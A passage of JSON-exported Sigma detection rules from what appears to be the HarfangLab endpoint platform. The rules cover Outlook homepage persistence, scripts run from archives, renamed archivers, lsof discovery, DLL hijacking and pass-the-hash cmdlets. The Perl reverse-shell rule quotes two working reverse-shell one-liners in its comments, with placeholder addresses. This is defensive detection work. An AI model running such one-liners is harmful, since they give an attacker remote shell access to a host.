"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626798Z",
"creation_date": "2026-03-23T11:45:34.626800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626804Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md",
"https://attack.mitre.org/techniques/T1137/004/"
],
"name": "t1137_004_outlook_homepage_changed.yml",
"content": "title: Microsoft Outlook Homepage Changed via Registry\nid: 1c0971b5-dd3d-4802-967a-67f521f0ac2c\ndescription: |\n Detects a change of the Microsoft Outlook homepage via the registry.\n Attackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\n It is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md\n - https://attack.mitre.org/techniques/T1137/004/\ndate: 2021/06/24\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.004\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Outlook\\WebView\\\\*\\URL'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c",
"rule_name": "Microsoft Outlook Homepage Changed via Registry",
"rule_description": "Detects a change of the Microsoft Outlook homepage via the registry.\nAttackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\nIt is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2026-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085596Z",
"creation_date": "2026-03-23T11:45:34.085599Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085603Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/dez_/status/1620828523094228992",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_script_execution_from_archive.yml",
"content": "title: Script Executed from Archive\nid: 1c2f6b57-2c30-4918-afa5-ff6fff38e99d\ndescription: |\n Detects the execution of a script from an archive using wscript.exe or cscript.exe.\n This can be indicative of a user execution of a malicious script, directly from the archive browser.\n It is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\nreferences:\n - https://twitter.com/dez_/status/1620828523094228992\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/09/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains:\n - '?:\\Users\\\\*\\Temp\\RAR$'\n - '?:\\Users\\\\*\\Temp\\7z'\n - '?:\\Users\\\\*\\Temp\\Temp?_*.zip\\'\n - '?:\\Users\\\\*\\Temp\\\\*_*.zip.???\\'\n\n exclusion_ivanti:\n ParentImage:\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_landesk:\n ParentImage|endswith: '\\Microsoft\\Dynamics Ax*\\New\\Files\\VisualCPP*.exe'\n\n exclusion_octave:\n CommandLine: 'wscript.exe ?:\\Users\\\\*AppData\\Local\\Programs\\GNU Octave\\Octave-*\\octave.vbs * ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_*.zip.???\\\\*'\n\n exclusion_ibm:\n CommandLine: '?:\\Windows\\System32\\WScript.exe ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_IBMiAccess_*.zip.dc7\\Windows_Application\\install_*.js '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d",
"rule_name": "Script Executed from Archive",
"rule_description": "Detects the execution of a script from an archive using wscript.exe or cscript.exe.\nThis can be indicative of a user execution of a malicious script, directly from the archive browser.\nIt is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1c812220-3709-4900-82e9-d3a5410edada",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606332Z",
"creation_date": "2026-03-23T11:45:34.606336Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606343Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_archiver_tool_renamed.yml",
"content": "title: Renamed Archiver Tool Executed\nid: 1c812220-3709-4900-82e9-d3a5410edada\ndescription: |\n Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\n Renamed archivers have been observed in use by threat actors for exfiltrating data.\n It is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2020/12/15\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_original:\n - Description: 'Command line RAR'\n - OriginalFileName:\n - '7z.exe'\n - '7za.exe'\n selection_goodname:\n - Image:\n - '*\\rar.exe'\n - '*\\unrar.exe'\n - '*\\7z.exe'\n - '*\\7za.exe'\n\n exclusion_unetbootin:\n Image|endswith: 'AppData\\Local\\Temp\\sevnz.exe'\n\n exclusion_known_fp:\n - ParentImage:\n - '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n - '?:\\Program Files (x86)\\NCH Software\\ExpressZip\\expresszip.exe'\n - '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\7zS8D4DFD71\\BlueStacksInstaller.exe\n # D:\\Utilisateurs\\XXX\\AppData\\Local\\Temp\\7zS033C881C\\BlueStacksInstaller.exe\n - '*\\AppData\\Local\\Temp\\7zs????????\\BlueStacksInstaller.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_637623756875899969\\WD Discovery\\WD Discovery.exe\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_*\\WD Discovery\\WD Discovery.exe'\n - Image:\n - '?:\\Program Files (x86)\\BluestacksCN\\Engine\\7zr.exe'\n - '?:\\Program Files\\BlueStacks_nxt\\7zr.exe'\n - '?:\\Program Files (x86)\\Lenovo\\LockScreen\\7zwrap.exe'\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WDDiscoveryInstaller.Resources.7za.exe'\n - '*\\NCH Software\\Components\\7zip\\7Zip.exe'\n - '*\\NCH Software\\Components\\7za32\\7Za32.exe'\n - '?:\\program files\\wondershare\\pdfelement*\\zip.exe'\n - '?:\\Program Files\\Wondershare\\Wondershare PDFelement pour Windows *\\zip.exe'\n - '?:\\Windows\\LTSvc\\_LTUPDATE\\LabtechUpdate.exe'\n\n condition: selection_original and not selection_goodname and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of archivers by an administrator or a third-party application.\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1c812220-3709-4900-82e9-d3a5410edada",
"rule_name": "Renamed Archiver Tool Executed",
"rule_description": "Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\nRenamed archivers have been observed in use by threat actors for exfiltrating data.\nIt is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294983Z",
"creation_date": "2026-03-23T11:45:35.294987Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295020Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_lsof_macos.yml",
"content": "title: Currently Open Files Listed via Lsof (macOS)\nid: 1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b\ndescription: |\n Detects the execution of the lsof command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\n It is recommended to check for malicious behavior by the process launching lsof.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/lsof'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '/Applications/GlobalProtect.app/Contents/Resources/PanGPS'\n - '/Applications/PyCharm CE.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Users/*/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Applications/Webex.app/Contents/MacOS/Webex'\n - '/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Users/*/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/steam_osx'\n - '/Applications/AWS VPN Client/AWS VPN Client.app/Contents/Resources/AWS VPN Client/Contents/MacOS/ACVCHelperTool'\n - '/Library/PrivilegedHelperTools/com.amazonaws.acvc.helper'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n - '/Applications/GitKraken.app/Contents/Frameworks/GitKraken Helper (Renderer).app/Contents/MacOS/GitKraken Helper (Renderer)'\n - '/Users/*/Applications/IntelliJ IDEA Ultimate.app/Contents/MacOS/idea'\n - '/applications/rider.app/contents/macos/rider'\n - '/Applications/GoLand.app/Contents/MacOS/goland'\n - '/Applications/IntelliJ IDEA CE.app/Contents/MacOS/idea'\n - '/Applications/RubyMine.app/Contents/MacOS/rubymine'\n - '/Users/*/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Applications/Android Studio.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac_5.app/Contents/MacOS/CleanMyMac_5'\n - '/Applications/Android Studio Preview.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac X.app/Contents/MacOS/CleanMyMac X'\n - '/Users/*/Library/Application Support/WebEx Folder/Add-ons/Cisco WebEx Start.app/Contents/MacOS/Cisco WebEx Start'\n - '/Applications/SekoiaEndpointAgent.app/Contents/MacOS/SekoiaEndpointAgent'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper.app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/MacOS/VMware Fusion Applications Menu'\n - '/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n - '/private/var/folders/*/com.docker.install/in_progress/Docker.app/Contents/MacOS/install'\n - '/Applications/Docker.app/Contents/MacOS/install'\n\n # /usr/sbin/lsof -g -o -R /Users//Library/Application Support/WebEx Folder/MC_/Meeting Center.app\n exclusion_cisco_meeting_center:\n ParentImage|endswith: '/Cisco WebEx Start'\n CommandLine|contains|all:\n - '/usr/sbin/lsof -g -o -R /Users/'\n - 'Library/Application Support/WebEx Folder/MC_'\n - 'Meeting Center.app'\n\n # lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions//Google Chrome Framework\n exclusion_google_chrome_updater:\n CommandLine: 'lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Google Chrome Framework'\n\n # lsof -OPln -p \n exclusion_vs_code:\n GrandparentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code - Helper (Renderer).app/Contents/MacOS/Code - Helper (Renderer)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Renderer).app/Contents/MacOS/Code - Insiders Helper (Renderer)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n CommandLine|startswith: 'lsof -OPln -p'\n\n exclusion_cwd:\n ParentCommandLine: '/bin/sh -c lsof -OPln * | grep cwd'\n\n exclusion_ampdevicesagent:\n CommandLine|startswith: '/usr/sbin/lsof -c AMPDevicesAgent'\n\n exclusion_edge:\n CommandLine: 'lsof /Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Microsoft Edge Framework'\n\n exclusion_ninjarmm:\n ParentImage: '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n\n exclusion_rider:\n ParentImage:\n - '/Users/*/Applications/Rider.app/Contents/MacOS/rider'\n - '/Applications/Rider 2.app/Contents/MacOS/rider'\n\n exclusion_inteliJ_idea:\n ParentImage|endswith: '/IntelliJ IDEA.app/Contents/MacOS/idea'\n # TODO : signed: 'true'\n\n exclusion_bluejeans:\n ParentImage: '/Applications/BlueJeans.app/Contents/Resources/daemon/BlueJeansHelper.app/Contents/MacOS/BlueJeansHelper'\n\n exclusion_activity_monitor:\n ParentImage: '/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor'\n\n exclusion_android_studio:\n ParentImage: '/Applications/Android Studio.app/Contents/MacOS/studio'\n\n exclusion_erlang:\n Ancestors|startswith: '/bin/bash|/bin/bash|/opt/homebrew/Cellar/erlang/'\n\n # lsof -d 0-9999999 -lna -p \n exclusion_unknown:\n CommandLine|re: '^lsof -d 0-9999999 -lna -p \\d+$'\n ParentCommandLine: '/bin/sh -s unix:cmd'\n GrandparentCommandLine: '/bin/sh -s unix:cmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b",
"rule_name": "Currently Open Files Listed via Lsof (macOS)",
"rule_description": "Detects the execution of the lsof command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\nIt is recommended to check for malicious behavior by the process launching lsof.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1cf5a84d-3577-4fed-aad6-e9be68687766",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096335Z",
"creation_date": "2026-03-23T11:45:34.096338Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tcmsetup.yml",
"content": "title: DLL Hijacking via tcmsetup.exe\nid: 1cf5a84d-3577-4fed-aad6-e9be68687766\ndescription: |\n Detects potential Windows DLL Hijacking via tcmsetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tcmsetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\TAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1cf5a84d-3577-4fed-aad6-e9be68687766",
"rule_name": "DLL Hijacking via tcmsetup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tcmsetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618088Z",
"creation_date": "2026-03-23T11:45:34.618090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618094Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_perl_macos.yml",
"content": "title: Reverse Shell Executed via Perl (macOS)\nid: 1d0a5e73-d3a2-4ecd-9969-fe46c41edd38\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Perl.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/11/14\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.perl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image: '/usr/bin/perl'\n\n # perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n selection_variant1:\n CommandLine|contains|all:\n - ' Socket'\n - 'socket('\n - 'connect('\n - 'open('\n - 'STDIN'\n - 'STDOUT'\n - 'exec('\n\n # perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"[IPADDR]:[PORT]\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n selection_variant2:\n CommandLine|contains|all:\n - 'perl'\n - 'IO::Socket::INET('\n - 'STDIN'\n - 'fdopen('\n - 'system'\n\n condition: selection_base and 1 of selection_variant*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38",
"rule_name": "Reverse Shell Executed via Perl (macOS)",
"rule_description": "Detects a suspicious command line related to a reverse shell execution via Perl.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-03-31",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d290732-2a4c-43db-875e-699d2462cd5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608016Z",
"creation_date": "2026-03-23T11:45:34.608020Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608027Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Invoke-TheHash",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1550/002/"
],
"name": "t1059_001_powershell_malicious_cmdlet_invoke_thehash.yml",
"content": "title: Malicious PowerShell Invoke-TheHash Commandlets Used\nid: 1d290732-2a4c-43db-875e-699d2462cd5d\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\n Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\n Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\n It is recommended to check other PowerShell command and the process behavior for suspicious activities.\nreferences:\n - https://github.com/Kevin-Robertson/Invoke-TheHash\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2022/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.Invoke-TheHash\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Invoke-WMIExec'\n - 'Invoke-SMBExec'\n - 'Invoke-SMBEnum'\n - 'Invoke-SMBClient'\n - 'Invoke-TheHash'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d290732-2a4c-43db-875e-699d2462cd5d",
"rule_name": "Malicious PowerShell Invoke-TheHash Commandlets Used",
